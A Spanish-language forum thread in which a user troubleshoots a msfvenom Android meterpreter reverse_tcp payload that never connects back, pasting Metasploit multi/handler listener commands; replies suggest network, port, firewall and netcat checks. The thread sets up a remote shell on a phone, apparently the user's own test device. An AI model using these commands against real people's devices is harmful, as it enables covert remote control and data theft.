msfvenom/ android payload no started

Iniciado por sinpianwlr, 28 Julio 2018, 21:04 PM

0 Miembros y 1 Visitante están viendo este tema.

sinpianwlr

Hola que tal a todos tengo problemas al ejecutar el exploit de msfvenom ya descargue la apk a mi terminal para pruebas, una ves echo el apk me dirijo a comenzar con la consola de msf denntro configuro los comandos de esta forma


msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 00.000.0.00
lhost => 000.000.0.00
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > exploit

  • Started reverse TCP handler on 192.168.1.67:4444

    ......... de este proceso no pasa y no se que es lo que falla o esta mal........

animanegra

Esta el movil en tu WiFi?? Has puesto el mismo Puerto y la misma IP en el apk y la k te sale ahi k esta a la escucha??

42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.

XKC

Cita de: sinpianwlr en 28 Julio 2018, 21:04 PM
Hola que tal a todos tengo problemas al ejecutar el exploit de msfvenom ya descargue la apk a mi terminal para pruebas, una ves echo el apk me dirijo a comenzar con la consola de msf denntro configuro los comandos de esta forma


msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 00.000.0.00
lhost => 000.000.0.00
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > exploit

  • Started reverse TCP handler on 192.168.1.67:4444

    ......... de este proceso no pasa y no se que es lo que falla o esta mal........
Cuando pones el aprametro lhost yo suelo poner mi iplocal, hago un ipconfig y la pongo aunque puede ser que asi tambien funcione bien.
Tienes que asegurarte que tu movil esta en la misma red que tu equipo atacante, puesto que estas utilizando una ip interna, entonces para comprobarlo te recomendaria que desde tu equipo levantes un server apache y comprueba que desde el movil puedes entrar a el con la ip privada.
Saludos.
Para poder atacar y vencer con seguridad, ataca donde ellos no puedan defenderse.
Para defenderte y resistir firme, defiéndete en donde ellos no atacarán.

sinpianwlr

Cita de: animanegra en 28 Julio 2018, 22:40 PM
Esta el movil en tu WiFi?? Has puesto el mismo Puerto y la misma IP en el apk y la k te sale ahi k esta a la escucha??

El movil esta conectado a mi misma red y si son los mismos parametros en la apk pero no me sale nada en escucha

animanegra

Igual pega tambien el commando del msfvenom.
Por otro lado, has verificado que en el ordenador a la escucha no tienes firewall tapando ESE Puerto? Si pones un nc n l 4444 llegas desde el movil?

42
No contesto mensajes por privado, si tienes alguna pregunta, consulta o petición plantéala en el foro para que se aproveche toda la comunidad.